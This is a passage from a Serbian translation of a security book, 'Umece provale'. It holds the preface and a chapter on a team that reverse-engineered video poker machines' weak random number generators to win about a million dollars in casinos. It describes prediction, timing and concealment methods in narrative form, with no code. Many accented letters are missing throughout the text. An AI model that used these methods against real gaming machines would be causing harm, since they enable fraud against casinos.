556 Umece Provale

Predgovor
Hakeri klinci i oni ne tako mladi neprestano se nadmeu meu sobom. Svakako bi se proslavio onaj ko bi se mogao pohvaliti upadom u Web prezentaciju moje kompanije za bezbednost, ili u moj lini sistem. Zadovostvo bi im priinilo i ako bi uspeli da izmisle priu o upadu u neki sistem i predstave je meni i koautoru ove kige, Bilu Sajmonu, tako uverivo da nas ona ponese, da poverujemo u u i ukuimo je u kigu. To je pred nas dvojicu postavilo fascinirajui izazov, borbu umova koja se odvijala svaki put kada smo vodili razgovore za ovu kigu. Veina novinara i pisaca lako utvruje autentinost izjave. Da li je osoba s kojom razgovaraju zaista osoba za koju se predstava? Da li ta osoba jeste ili je bila na poloaju koji navodi? Da li ta osoba radi ili je radila za navedenu organizaciju? Da li ta osoba ima dokumenta kojima bi potkrepila priu, i moe li se utvrditi da su ta dokumenta vaana? Postoje li pouzdani udi koji e podrati priu ili neke ene delove? Ali, iskrenost hakera malo je tee proveriti. Veina udi ije se prie nalaze u ovoj kizi, osim nekoliko ih koji su ve bili u zatvoru, bili bi sudski goeni ako bi ihov pravi identitet bio utvren. Zbog toga je malo verovatno da e vam oni otkriti svoja prava imena kao dokaz. Ispriali su mi svoje prie samo zato to mi veruju. Znaju da sam bio u zatvoru, i oslaaju se na to da ih neu izdati i dovesti u situaciju u kojoj sam i sm bio. Uprkos rizicima, mnogi od ih su ponudili opipive dokaze svojih upada. Naravno, mogue je zapravo, verovatno je da su neki i preuveliali svoje uspehe, dodajui priama detae koji ih ine zanimivijim, ili da su razvili potpuno izmiene prie, ali su ih zasnovali na ostvarivim podvizima, tako da zvue istinito. Zbog tih rizika, vrsto smo se pridravali visokih standarda pouzdanosti. U svim razgovorima ispitivao sam svaki tehniki deta, traio detana objaea svega to nije zvualo verodostojno, a ponekad sam se
ix
x Umee provale
kasnije vraao na istu priu da bih video da li je i dae ista, ili e sagovornik neto izmeniti. Sumu su budile osobe koje nisu mogle da se sete kako su izvele neki teak korak i izostavile ga iz prie. Takoe, nisam verovao osobama koje nisu izgledale kao da znaju dovono da bi uradile ono to tvrde da jesu, ili nisu mogle da objasne kako su stigle od take A do take B. Osim tamo gde je izriito navedeno drugaije, sve glavne prie u ovoj kizi poloile su moj test verovatnoe. Bil i ja smo se sloili oko uverivosti svake osobe ija je pria ukuena u kigu. Meutim, detae smo esto meali da bismo zatitili i hakera i rtvu. U isto vreme, poto kompanije koje prave softver i hardver stalno otklaau bezbednosne propuste pomou zakrpa i novih verzija proizvoda, samo jo neki podvizi opisani u kizi i dae imaju isti efekat. Previe samopouzdan italac mogao bi pomisliti da nema o emu da brine poto e nedostaci biti otkloeni ili ve jesu, on ili egova kompanija nemaju ega da se plae. Meutim, lekcija koju treba da nauite iz ovih pria jeste da hakeri pronalaze nove slabosti svaki dan. Proitajte kigu ne da biste saznali pojedinane nedostatke pojedinanih proizvoda, ve da biste promenili svoje stavove i postali odluniji. Proitajte je i da biste se zabavili, i poeli da boe shvatate iznenaujue podvige ovih opasno vetih hakera. Neke prie su okantne, neke e vam otvoriti oi, a u nekima ete se nasmejati inspiraciji i drskosti hakera. Ukoliko se bavite informacionim tehnologijama ili bezbednou, iz svake prie saznaete kako da svoju organizaciju uinite sigurnijom. Ako niste tehniki nastrojeni, ali volite kriminalistike prie, pune drskosti, rizika i hrabrosti, sve to ete pronai u ovoj kizi. Svaka opisana avantura suoava se sa opasnou nailaska na vrata iza kojih, sa spremnim lisicama, eka itava potera policajaca, FBI agenata i tipova iz tajne slube. U mnogim sluajevima, upravo to se i desilo. Za one ostale, ta mogunost i dae postoji. Nije ni udo to neki od ovih hakera nikada ranije nisu hteli da ispriaju svoje avanture. Veina onih o kojima ete itati u ovoj kizi objavena je po prvi put.
Poglavlje 1
Hakerisanjem kazina do milion dolara
Kad god [neki programer] kae: Niko se nee muiti oko toga, nae se klinac u Finskoj raspoloen da se pomui. Aleks Mejfild
ivotu svakog kockara doe magian trenutak kad jednostavna uzbuea prerastu u 3D fantazije momenat kada pohlepa proguta etiku, a sistem kazina postane samo jo jedna planina koja eka da bude osvojena. U tom trenutku, matae o proverenom nainu da se pobede stolovi ili maine oduzima dah. Aleks Mejfild i egova tri druga nisu samo saarili. Kao i mnogi drugi upadi, i ovaj je poeo kao veba inteligencije, provera da li je neto mogue. Na kraju, ih etvorica su pobedili sistem i olakali kazina za oko milion dolara, pria Aleks. Ranih devedesetih, etiri prijatea su radila kao savetnici za visoke tehnologije i iveli oputeno i nonalantno. Znate ve radite, zaradite neke pare, a onda ne radite dok ne ostanete vorc. Las Vegas je bio daleko dekor za snimae filmova i TV serija. Upravo zato, kada je firma za razvoj tehnologije ponudila momcima zadatak da naprave softver i isprate ga na tamou konvenciju o visokoj tehnologiji, oni su ponudu oberuke prihvatili. To bi im bila prva poseta Vegasu, ansa da i sami vide betava svetla, i to s plaenim trokovima. Ko bi to odbio? Zasebni apartmani u velikom hotelu znaili su da zabavi mogu da se pridrue i Aleksova supruga i Majkova devojka. Dva para, plus Lari i Marko, otisnuli su se put vrelog Grada greha.
Aleks kae da nisu znali mnogo o kockau niti o tome ta da oekuju. Izaete iz aviona, a svuda oko vas starije gospoe igraju na slot mainama. Sve to izgleda smeno i ironino, i uvue vam se u svaku poru. Poto su zavrili posao na sajmu, etiri prijatea i dve dame otili su u kazino u svom hotelu, igrali na slot mainama i uivali u besplatnim pivima, kada je Aleksova supruga pred ih postavila izazov.
Zar ove maine nisu zasnovane na raunarima? Momci, vi se time bavite, zar ne moete da uinite neto da bismo osvojili vie novca?
2 Umee provale
Drugari su se preselili u Majkov apartman i poeli da izbacuju pitaa i postavaju teorije o nainu na koji aparati rade.
Istraivae
To je bio okida. Sve to nas je zainteresovalo i, po povratku kui, poeli smo da ispitujemo stvar, pria Aleks, oivavajui seaa na kreativnu fazu. Vrlo brzo, istraivae je podralo ono to su ve pretpostavali. Da, to su u osnovi raunarski programi. Zanimalo nas je postoji li nain da provalimo te maine? Neki udi su pobedili slot maine tako to su zamenili firmver u mainu bi ubacili kompjuterski ip i program zamenili drugim koji bi omoguio atraktivnije isplate nego to je kazino predvideo. Mada su drugi timovi to radili, inilo se da takva akcija zahteva dogovor s radnikom kazina, i to ne sa bilo kojim radnikom, ve s tehniarem zaduenim za slot maine. Za Aleksa i egove ortake zameivae ROM-ova bilo je kao tresnuti baku po glavi i oteti joj tanu. Zakuili su da bi se u sve to uputali samo ako bi cela akcija bila izazov za ihove programerske vetine i intelekt. Povrh svega, oni nisu bili naroito talentovani za lano predstavae (engl. social egineering). Bavili su se raunarima, ali nisu znali kako da priu zaposlenom u kazinu i predloe da im se pridrui u maoj prevari kojom e uzeti neto tueg novca. Ali kako e reiti problem? Aleks je objasnio:
Pitali smo se da li bismo mogli predvideti sekvencu karata. Ili, da li moda postoje zada vrata [programski kd koji omoguava kasniji neovlaen pristup programu], koja je neki programer napravio radi sopstvene koristi. Sve programe su pisali
programeri, a oni su vragolasti stvorovi. Pomislili smo da bismo mogli nabasati na zada vrata, na primer tako to emo pritisnuti odreenu sekvencu dugmadi i tako promeniti verovatnou dobitka, ili sami programirati pukotinu koju bismo mogli da iskoristimo.
Aleks je proitao kigu The Eudaemonic Pie Tomasa Basa (Thomas Bass) (Penguin, 1992), priu o grupi momaka koji su se bavili raunarima i fizikom. Oni su osamdesetih pobedili rulet u Las Vegasu koristei sopstvenu verziju prenosivog raunara, veliine pakle cigareta, koji je predviao rezultat na ruletu. Jedan lan tima za stolom pritiskao je dugmad unosei brzinu toka ruleta i nain rotiraa kuglice. Raunar je radio-talasima prenosio tonove u sluni aparat drugog lana tima koji je tumaio signal i kladio se na odgovarajui broj. Oekivali biste da su odneli tonu novca, ali nisu. Po Aleksovom mieu, Njihova ema je imala ogroman potencijal, ali je bila sputana nezgrapnom i nepouzdanom tehnologijom. Takoe, bilo je previe uesnika, pa su problem predstavali i ponaae i meusobni odnosi. Mi smo reili da ne ponovimo ihove greke. Aleks je zakuio da bi bilo lake pobediti igru zasnovanu na raunaru jer su raunari potpuno predvidivi rezultat zavisi od onoga to se prethodno desilo, ili, da parafraziramo staru izreku vezanu za lano predstavae, ubaci dobre podatke, dobije dobre podatke. (Originalan izraz na ovo gleda iz negativne perspektive: ubaci ubre, dobije ubre.) To mu je savreno odgovaralo. Kao mladi, Aleks je bio muziar, svirao je u kultnom bendu i saao o tome da postane rok zvezda, a kada to nije uspelo, prebacio se na prouavae matematike. Imao je talenta za matematiku i, mada nikada nije mario za kole (napustio je koled), nastavio je da se bavi tom temom sve dok nije stekao solidan nivo znaa. Poto je zakuio da je istraivae neophodno, otputovao je u Vaington i proveo neko vreme prouavajui dokumentaciju u zavodu za patente. Pomislio sam da je neko moda bio dovono glup da sav kd ubaci u patent za videopoker aparat. I naravno, bio je u pravu. U to vreme, strpati gomilu objektnog koda u patent bio je nain da podnosilac patenta zatiti svoj izum, jer kd sadri detaan opis izuma, ali u obliku koji nije naroito razumiv korisnicima. Uzeo sam mikrofilm sa
3 Poglavlje 1: Hakerisanjem kazina do milion dolara
4 Umee provale
objektnim kodom i pregledao strane pune heksadecimalnih brojeva traei zanimive odeke, koji su morali biti pretvoreni [u upotrebiv oblik]. Analizirae koda otkrilo je nekoliko tajni koje su zaintrigirale tim, ali su zakuili da se, ukoliko bi da odmaknu dae, moraju doepati konkretne maine koju hoe da hakeriu, i sami pogledaju kd. Njih etvorica su inili dobro usklaen tim. Majk je bio vie nego kompetentan programer, i znao je vie o hardveru nego ostala trojica. Marko, jo jedan bistar programer, bio je emigrant iz Istone Evrope tinejderskog izgleda. Ali, bio je prilino smeo pametakovi koji je svemu prilazio sa stavom mogu ja to. Aleks je bio odlian programer i doprineo je svojim poznavaem ifrovaa. Lari nije bio naroito dobar programer, a zbog udesa s motorom nije mogao mnogo da putuje. Meutim, on je bio odlian organizator koji je usmeravao projekat i vodio rauna da se svi fokusiraju na ono to u odreenoj fazi treba obaviti. Posle poetnih istraivaa, Aleks je zaboravio na projekat. Ali Marko se zagrejao za ideju. Nastavio je da insistira: Nije to nikakav problem, maine se mogu legalno kupiti u trinaest drava. Na kraju je uspeo da ubedi ostale da pokuaju. Pomislili smo, to da ne. Uspeli su da izdvoje dovono novca za put i kupovae maine. Ponovo su se uputili u Vegas ovaj put o svom troku i s drugim ciem na pameti. Aleks pria: Da biste kupili slot mainu, trebalo je samo da uete u radu i pokaete linu ispravu iz drave u kojoj takvu mainu moete legalno posedovati. Ukoliko ste imali vozaku dozvolu iz neke od tih drava, niko vas nije previe ispitivao. Jedan od ih je imao zgodnu vezu sa stanovnikom drave Nevada. Bio je to ujak neije devojke, ili tako neto, i on je iveo u Vegasu. Odluili su da Majk razgovara s tim ovekom jer ima drae trgovca i vrlo je reprezentativan tip. Pretpostava se da ete mainu koristiti za nelegalno kockae. Isto kao sa orujem, Aleks je objasnio. Mnogo maina je dospevalo na sivo trite prodavano je van dozvoenih kanala klubovima i slinim mestima. Ipak, iznenadilo ga je to su mogli da kupe potpuno isti aparat kao to su oni u kazinu. Majk je oveku dao 1.500 dolara za mainu japanske proizvode. Onda smo nas dvojica utovarili prokletiu u kola. Vozili smo kui kao da na zadem seditu imamo bebu.
Razvijae upada
Majk, Aleks i Marko su odteglili aparat uz stepenice, na drugi sprat kue u kojoj su mogli da koriste slobodnu spavau sobu. Ovo iskustvo je Aleks dugo pamtio kao jedno od najveih uzbuea u svom ivotu.
Otvorili smo je, izvadili ROM i utvrdili koji je to procesor. Ja sam odluio da uzmemo japansku mainu koja je izgledala kao imitacija jedne poznate marke. Pomislio sam da su ineeri moda bili pod veim pritiskom, pa su bili lei ili malo nemarniji. Ispostavilo se da sam bio u pravu. Koristili su [ip] 6809, slian ipu 6502 koji ste mogli nai u raunaru Apple II ili Atari. Bio je to 8-bitni ip s memorijom od 64K. Poto sam programirao na asemblerskim jezicima, bio mi je poznat.
Aparat koji je Aleks odabrao koristio se ve desetak godina. Kad god kazino hoe da kupi mainu novog dizajna, Komisija za kockae (Las Vegas Gaming Commission) mora da proui program i pobrine se da on bude takav da isplate igraima budu potene. Odobravae novog dizajna moe potrajati, pa kazina zadravaju stare aparate due nego to biste oekivali. inilo se da e starija maina verovatno sadrati prevazienu tehnologiju i tim se nadao da e je lake napasti. Raunarski kd koji su preuzeli sa ipa bio je u binarnom obliku niz jedinica i nula koje predstavaju osnovni nivo kompjuterskih uputstava. Da bi ih preveli u oblik s kojim bi mogli da rade, prvo su morali da se pozabave reverznim ineeringom (engl. reverse engineering) procesom kojim ineer ili programer utvruje kako je postojei proizvod projektovan. U ovom primeru, to je znailo prevoee jezika maine u kd koji su momci mogli da razumeju i s kojim su mogli da rade. Aleksu je trebao disasembler za prevoee koda. etvorka nije htela da izazove sumu kupovinom programa to bi bilo kao da su otili u biblioteku i pozajmili kige o praveu bombe. Sami su napisali disasembler, a Aleks taj posao opisuje kao ne ba prost ko pasu, ali zabavan i relativno lak. Poto su kd iz poker aparata propustili kroz novi disasembler, tri programera su sela i poela da prolivaju znoj nad im. Vian projektant softvera obino brzo pronalazi delove programa na koje hoe da se
6 Umee provale
usredsredi. To je zato to osoba koja pie kd svud po emu ostava saobraajne znake napomene, komentare i primedbe koji objaavaju funkciju svakog dela koda, slino kao to kiga ima naslove delova, poglava, i podnaslove odeaka unutar poglava. Kada se program prevede u oblik koji maina moe da proita, ti saobraajni znaci se ignoriu raunaru ili mikroprocesoru oni ne trebaju. Zbog toga, kodu dobijenom ovakvom analizom nedostaju ta korisna objaea. Da se opet posluimo metaforom saobraajnih znakova ovako dobijen kd lii na mapu bez imena mesta, bez oznaka autoputeva ili ulica. Pregledali su strane koda na ekranu traei odgovore na osnovna pitaa: Koja logika je primeena? Kako se karte meaju? Kako se biraju karte za zamenu? Ipak, u tom trenutku najvanije im je bilo da pronau kd generatora sluajnih brojeva (engl. random number generator). Aleks je ispravno pretpostavio da su japanski programeri koristili preice koje su ostavile greke u kodu generatora sluajnih brojeva. Zaista su ih koristili.
Ponovno pisae koda

Aleks ponosno opisuje svoj trud. Bili smo programeri i bili smo dobri u onome to smo radili. Shvatili smo kako se brojevi u kodu pretvaraju u karte na maini i napisali smo kd na jeziku C koji e raditi isto, ispriao je.
Imali smo motivaciju i non-stop smo radili. Mislim da nam je trebalo dve ili tri nedee da doemo do take kada smo zaista znali ta se deava u kodu. Pogleda kd, pretpostavi emu slui, napie nov kd, baci ga na ROM [raunarski ip], vrati u aparat i gleda ta se deava. Pisali smo rutine koje na ekranu preko karata ispisuju heksadecimalne brojeve. Tako smo dobili neku vrstu pregleda naina na koji kd deli karte. Bila je to kombinacija pokuaja i greaka i dubinske analize. Kd je vrlo brzo poeo da poprima smisao. Gotovo precizno smo shvatili kako se brojevi u raunaru pretvaraju u karte na ekranu.
Nadali smo se da je generator sluajnih brojeva bio relativno jednostavan. A ranih devedesetih bio je upravo takav. Malo sam istraivao i otkrio da je zasnovan na neemu to je Donald Knut napisao jo ezdesetih. Ti tipovi nisu nita izmislili, samo su iskoristili postojee istraivae metoda iz Monte Karla i slinih stvari, i ubacili ga u svoj kd. Otkrili smo taan algoritam koji su koristili za generisae karata. Zove se linearni pomini registar sa povratnom vezom (engl. linear feedback shift register, LFSR) i prilino je dobar generator sluajnih brojeva.
Meutim, uskoro su otkrili da ovaj generator ima fatalnu greku koja im je mnogo olakala posao. Majk je objasnio da je to bio relativno jednostavan 32-bitni generator sluajnih brojeva, pa je bilo mogue dostii sloenost izraunavaa potrebnu za egovo provaivae, a uz nekoliko dobrih optimizacija stvar je postala gotovo trivijalna. Znai, dobijeni brojevi nisu bili zaista nasumini. Aleks smatra da postoji dobar razlog zato je moralo biti tako.
Ukoliko bi brojevi zaista bili nasumini, ne biste mogli podesiti kvote. Ne bi mogli da se procene izgledi. Neki aparati uzastopno daju fle rojale. A oni ne bi trebali uopte da se pojavuju. Zbog toga projektanti ele mogunost provere ispravnosti statistike, inae imaju oseaj da ne kontroliu igru. Druga stvar koju projektanti nisu shvatili kada su napravili ovaj aparat, jeste to da im ne treba samo generator sluajnih brojeva. Statistiki u svakom deeu ima deset karata pet koje se vide na poetku, i po jedna zamena za svaku od poetnih karata koja e se pojaviti ukoliko igra odlui da je odbaci. Ispostavilo se da su rane verzije aparata tih deset karata uzimale iz deset sekvencijalnih nasuminih brojeva u generatoru sluajnih brojeva.
Tako su Aleks i egovi partneri shvatili da su programske instrukcije ovih starijih maina loe smiene. A zbog tih greaka videli su da mogu napisati relativno jednostavan, ali elegantan i domiat algoritam kojim e pobediti mainu.
Aleks je primetio da je trik u tome da ponete igru, vidite koje su karte prikazane na maini, i unesete podatke za identifikovae tih karata u raunar kod kue. Algoritam e izraunati gde je generator sluajnih brojeva bio i kroz koliko brojeva treba da proe pre nego to bude spreman da prikae eene karte fle rojal.
Seli smo za na aparat, pokrenuli svoj programi i on nam je tano rekao koja e biti sledea sekvenca karata. Bili smo prilino uzbueni.
8 Umee provale
To uzbuee Aleks je pripisao oseau da ste pametniji od nekoga i znate da ga moete pobediti. A to e, u naem sluaju, doneti i novac. Otili su u kupovinu i pronali runi sat marke Casio s funkcijom odbrojavaa koja se moe podesiti na desetine sekunde. Kupili su tri sata, po jedan za svakog lana koji e ii u kazina. Lari e ostati u bazi i odravati raunar. Bili su spremni za testirae metode. Jedan lan tima bi poeo da igra i javio bi koje je karte dobio broj i boju svih pet karata. Lari bi uneo podatke u ihov raunar. Mada je egova marka bila mae poznata, bio je to popularan raunar kod zaluenika i odlian izbor za ovu namenu, jer je imao mnogo bri ip od onog u japanskom poker aparatu. Trebalo mu je samo nekoliko trenutaka da izrauna tano vreme za odbrojavae koje treba podesiti na Casio satu. Kada se sat oglasi, igra na slot maini treba da pritisne dugme Play. Ali, to je morao uraditi u deliu sekunde. Aleks objaaava da to i nije bio toliko veliki problem kako se moda ini.
Nas dvojica smo neko vreme bili muziari. Kada ste muziar i imate dovono oseaja za ritam, moete pritisnuti dugme s kaeem maim od pet milisekundi.
Ukoliko sve bude radilo kao to je planirano, aparat e prikazati traeni fle rojal. Vebali su na svom aparatu dok svi nisu uspeli da otvore fle rojal nakon prihvativog broja pokuaja. U prethodnim mesecima, po Majkovoj prii, oni su izdvojili programski kd aparata, precizno utvrdili kako se sluajni brojevi pretvaraju u karte na ekranu, tano odredili kada i koliko brzo generator
sluajnih brojeva pravi petu, nauili sve bitne specifinosti maine i razvili program koji e sve te promenive uzimati u obzir. Kada vam je poznato stae pojedinane maine u odreenom trenutku, s visokom preciznou moete predvideti ponavae sluajnih brojeva u bilo kom trenutku u sledeih nekoliko sati, pa ak i dana. Pobedili su mainu pretvorili je u svog roba. Prihvatili su intelektualni izazov koji je upad postavio i pobedili su. Znae je moglo da ih uini bogataima. Bilo je lepo saariti o tome. Ali, da li su zaista mogli da izvedu akciju u dungli kazina?
Povratak u kazina ovaj put radi igre

Jedna je stvar privatno petati oko svog aparata, na bezbednoj lokaciji. Sesti usred prepunog kazina i ukrasti novac to je potpuno druga pria. Za to su potrebni elini ivci. Njihove dame su mislile da putuju samo radi zabave. Momci su ih ohrabrili da obuku uske sukice i upadivo se ponaaju kockaju se, priaju, kikou, naruuju pia nadajui se da e udi iz obezbeea koji upravaju kamerama biti ometeni lepim licima i oblinama. Zato smo insistirali na tome to smo vie mogli, sea se Aleks. Nadali su se da e se uklopiti, stopiti s masom. Majk je bio najboi. Bio je proelav, i on i egova supruga su izgledali kao tipini igrai. Aleks opisuje scenu kao da se sve desilo jue. Marko i Majk su akciju opisali malo drugaije, ali evo kako je sve izgledalo Aleksu. Sa svojom suprugom Eni prvo je obiao kazino i odabrao jedan video poker aparat. Morao je s velikom preciznou znati taan ciklus maine. Jedna metoda koju su koristili bila je da video kameru stave u torbicu. U kazinu bi igra postavo torbicu tako da objektiv kamere bude usmeren na ekran poker aparata i drao je neko vreme ukuenu. Bilo je nezgodno, sea se, postaviti torbu na odgovarajue mesto, a pri tom ne izgledati kao da je poloaj torbe bitan. Prosto, ne elite da uradite nita to bi delovalo sumivo i privlailo pau. Majk je vie voleo drugu metodu, koja je bila mae zahtevna: Ciklus ponavaa brojeva na nepoznatom aparatu izraunavali smo pomou dva oitavaa karata sa ekrana, u razmaku od vie sati. Morao je biti siguran da na maini u meuvremenu niko nije igrao jer bi se time promenila brzina ponavaa, ali to je bilo lako:
10 Umee provale
samo je trebalo da proveri da li su na ekranu prikazane karte koje je ostavio kada je posledi put igrao na maini, a to je obino bio sluaj jer se na mainama s visokim ulozima ne igra esto. Nakon drugog uitavaa prikazanih karata, podesio bi odbrojavae na Casio satu, a potom bi telefonom javio Lariju podatke o vremenu i sekvencama karata. Lari bi ih uneo u ihov raunar i pokrenuo program. Na osnovu tih podataka, raunar bi predvideo vreme sledeeg fle rojala. Nadate se da e se to desiti u roku od nekoliko sati, ali ponekad je trebalo da proe nekoliko dana, pa bi u tom sluaju pokuali s drugim aparatom, esto u drugom hotelu. Podeeno vreme na Casio satu moglo bi biti promaeno i za oko minut, ali ipak je bilo dovono precizno. Aleks i Eni su se u kazino vraali dosta ranije u sluaju da je neko seo za aparat koji oni ele, i igrali na drugim aparatima dok ihov ne bude slobodan. Aleks bi seo za cini aparat, a Eni za aparat do ega. Poeli bi da igraju i trudili se da izgledaju kao da se zabavaju. A onda:
Ja bih poeo da igram, podeavajui tajmer na runom satu. Zapamtio bih podeene karte vrednost i boju svih pet karata, a potom nastavio da igram sve dok ne zapamtim osam karata u sekvenci. Klimnuo bih svojoj eni kao znak da odlazim i krenuo ka zakloenijoj javnoj govornici izvan dvorane kazina. Imao sam oko osam minuta da odem do telefona, obavim ta sam morao i vratim se za aparat. Moja ena je nastavala da igra. Ukoliko bi neko hteo da koristi moj aparat, ona bi mu rekla da tu sedi en suprug. Smislili smo nain da pozovemo Larijev broj pejdera i da preko brojeva na tastaturi telefona unesemo karte. Tako nismo morali da izgovaramo oznake karata udi iz kazina uvek oslukuju takve stvari. Lari bi ponovo uneo karte u raunar i pokrenuo program. Potom bih ga pozvao. On bi slualicu drao iznad raunara koji bi dao dva kratka zvuna signala. Kada bih uo prvi zvuk, pritisnuo bih pauzu na brojau sata i zaustavio odbrojavae. Kada bih uo drugi zvuk, ponovo bih pritisnuo pauzu da bih restartovao broja.
Karte koje je Aleks javao govorile su raunaru taan poloaj na kom je bio generator sluajnih brojeva poker aparata. Unoeem kaea koje je odredio raunar, Aleks je unosio kunu ispravku u broja svog Casio sata tako da se on oglasi tano u trenutku kada e se pojaviti fle rojal.
Poto bih restartovao broja sata, vraao sam se aparatu. Kada bi se broja oglasio sa bip, bip, bum ba tada, u trenutku tog bum, ponovo bih pritisnuo dugme Play na aparatu. U tom prvom pokuaju mislim da sam osvojio 35.000 dolara. Doli smo do oko 30 ili 40 procenata uspenosti jer je sve bilo dobro razraeno. Nismo uspevali samo kada bismo uneli pogreno vreme.
Kada je prvi put osvojio novac, Aleks je bio veoma uzbuen, ali uplaen. Nadzornik stolova je bio neki namrgoeni Italijan. Bio sam siguran da me udno gleda, sa zbuenim izrazom lica, moda zato to sam stalno telefonirao. Mislim da je otiao da preslua trake. Uprkos napetosti, imalo je to svojih ari. Majk se prisea: Naravno, bio sam nervozan jer je neko mogao da primeti moje sumivo ponaae, ali zapravo, niko me nije udno gledao. Mene i moju suprugu tretirali su kao i druge dobitnike visokih uloga estitali su nam i davali poklone. Bili su toliko uspeni da su morali voditi rauna o tome da ne osvoje previe novca i ne privuku pau na sebe. Suoili su se s retkim problemom prevelikog uspeha. Sve je bilo vrlo javno. Osvajali smo ogromne dek potove u desetinama hiada dolara. Fle rojal ima kvotu 4000 prema 1. Na aparatu u koji se ubacuje 5 dolara, to je dvadeset hiada. Cifre su i vee. Neke igre su progresivne glavni zgoditak raste sve dok ga neko ne osvoji, a ovi momci su mogli i ih lako da dobiju.
Osvojio sam jedan koji mi je doneo 45 hiada. Priao mi je tehniar sa irokim pojasom on verovatno i poprava maine. Taj ovek ima poseban ku koji nemaju udi to rade u dvorani. Otvori kuite, izvadi [elektronsku] plou, izvadi ROM ip pred vama. Sa sobom nosi ita ROM-a i testira ip iz maine poredei ga sa zlatnim masterom koji se uva pod kuem.
12 Umee provale
Aleks je saznao da je provera ROM-a standardna procedura ve vie godina. Pretpostava da su ih dosad dosta ispaivali, pa su najzad otkrili kako da izvedu proveru ROM-a kao protivmeru. Aleksova izjava me je navela da se zapitam da li kazina obavaju ove provere jer su neki tipovi koje sam sreo u zatvoru zameivali firmver. Pitao sam se kako su to mogli tako brzo da obave i izbegnu otkrivae. Aleks smatra da je tajna u lanom predstavau sigurno su se dogovorili sa obezbeeem i potplatili nekog u kazinu. On je pretpostavao da su moda zamenili i zlatni master s kojim se poredi ip iz aparata. Aleks ostaje pri tome da je lepota upada koji je obavio egov tim bila je u tome to nisu morali da meaju firmver. A smatrali su da je ihov pristup bio i mnogo vei izazov. Tim nije smeo da nastavi da osvaja toliko novca. Bilo je jasno da e neko sabrati dva i dva i rei: Ovog tipa sam ve negde video. Uplaili smo se da e nas uhvatiti. Pored stalno prisutnih briga da e biti uhvaeni, morali su se pozabaviti i pitaem poreza. Za svaki dobitak preko 1.200 dolara, kazino trai lina dokumenta i isplatu prijavuje poreskoj slubi. Majk kae: Pretpostavali smo da e, ukoliko igra ne d linu kartu, porez biti odbijen od dobitka, ali nismo hteli da privlaimo pau otkrivajui da li je ta pretpostavka tana. Plaae poreza nije bilo veliki problem, ali ono ostava podatke koji govore da osvajate nenormalne koliine novca. Zbog toga se mnogo planiraa odnosilo na pronalaee naina da ostanemo u potaji. Morali su da smisle drugaiji pristup. Nakon kraeg vremena telefoniraa kui, rodila se nova ideja.
Nov pristup
Ovaj put momci su imali dva cia: razvijae metode koja bi im omoguila da otvore ful, kentu ili pet karata iste boje, tako da isplate ne budu homogene i ne privlae pau. Drugi ci je da cela akcija bude mae oigledna i mae dosadna od stalnog trkaraa do telefona pre svake igre. Poto je u kazinima postojao ogranien broj japanskih aparata, momci su se ovaj put ustremili na ameriku mainu koja se vie koristi. Rastavili su je na isti nain i otkrili da je proces generisaa sluajnih
brojeva mnogo sloeniji: aparat je koristio dva generatora koji su se kombinovali, umesto samo jednog. Programeri su bili mnogo svesniji mogunosti upada hakera, zakuio je Aleks. Ali i ovde su etvorica otkrila bitnu greku projektanata. Verovatno su na papiru proitali da se nasuminost poveava ako dodate drugi registar, ali to su uradili pogreno. Da bi se odredila bilo koja karta, broj iz prvog generatora sluajnih brojeva sabiran je s brojem iz drugog. Da bi ovo ispravno funkcionisalo, drugi generator bi morao da krui tj. da mea svoju vrednost nakon deea svake karte. Projektanti to nisu uradili; programirali su drugi registar da krui na poetku svakog deea, pa se za svaku kartu u jednom deeu rezultatu prvog registra dodaje isti broj. Koriee dva registra bio je izazov za Aleksa zadatak iz kriptologije. Liilo mu je na korake koji su se ranije koristili u ifrovau poruka. Mada je znao poneto o toj temi, to nije bilo dovono da pronae reee, pa je poeo da putuje do obiliee univerzitetske biblioteke i istrauje.
Da su projektanti paivije proitali neke kige o sistemima ifrovaa, ne bi napravili ovu greku. Takoe, trebalo je da budu metodiniji prilikom testiraa sistema da bi ga razbili onako kako smo ga mi razbili. Svaki student koji je diplomirao raunarske nauke verovatno bi mogao da napie kd koji bi radio ono to smo mi pokuavali da uradimo, im biste mu rekli ta se trai. Najkakiviji deo odnosio se na pronalaee algoritama koji bi brzo obavili pretragu i u roku od nekoliko sekundi rekli ta se deava. Ako biste to naivno uradili, pronalaee reea moglo bi trajati nekoliko sati. Mi smo prilino dobri programeri, i svi i dae zaraujemo od tog posla, pa smo doli do nekih vrlo matovitih optimizacija. Ipak, ne bih to nazvao trivijalnostima.
Seam se sline greke koju je napravio programer kompanije Norton (pre nego to ga je Symantec kupio) radei na ihovom proizvodu Diskreet, programu koji je korisniku omoguavao da pravi ifrovane virtuelne ureaje. On je pogreno ugradio algoritam a moda je to uradio i
14 Umee provale
namerno pa je prostor za ku ifre smaen sa 56 bitova na 30. ak i u to vreme, bilo je mogue na silu pogoditi 30-bitni ku. Svako ko je koristio ovaj proizvod neosnovano se oseao bezbednim: napada je mogao da otkrije ku u razumnom vremenskom periodu i doe do podataka. Tim je otkrio istu vrstu greke u programskom kodu aparata. Dok su radili na raunarskom programu koji bi im omoguio da dobiju na novoj cinoj maini, momci su pritiskali i Aleksa da osmisli pristup koji nee zahtevati da tre do govornice. Inspiraciju za reee pronali su na stranama kige Eudaemonic Pie : nosivi raunar. Aleks je izumeo sistem saien od minijaturnog kompjutera, napravenog oko male mikroprocesorske ploe koju su Majk i Marko pronali u katalogu. Uz u je ilo i kontrolno dugme koje je moglo stati u cipelu, i beumni vibrator poput onih iz danaih mobilnih telefona. Sistem su zvali svojim depnim kompjuterom. Morali smo da smislimo kako da ga napravimo na malom ipu s malom memorijom, pria Aleks. Napravili smo fin hardver, pa je sve moglo da stane u cipelu i bilo je ergonomskog oblika. (Ergonomski je u ovom sluaju znailo da je ureaj bio dovono mali da moete hodati bez hramaa!)
Novi napad
Tim je poeo da isprobava novu emu, a to je prilino uticalo na ihove ivce. Naravno, vie nije bilo sumivog trkaa do govornice pre svakog osvajaa novca. Ali, i pored svih generalnih proba u ihovoj kancelariji, premijera je bilo izvoee pred prilino velikom publikom uvek sumiavih udi iz obezbeea. Ovaj put program je napraven tako da due mogu da sede za jednim aparatom, osvajajui vie maih, i mae sumivih svota. Aleks i Majk se priseaju napetosti dok opisuju kako je sistem radio.
Aleks: Obino bih raunar stavao u dep, u neto to je liilo na mali tranzistorski radio. Sproveo bih icu od raunara u arapu i u prekida koji se nalazio u cipeli. Majk: Ja sam svoj lepio za lanak. Prekidae smo napravili od komadia ploe za konstruisae modela elektronskih kola (engl. breadboard). Komadi su bili kvadratii strane oko jedan
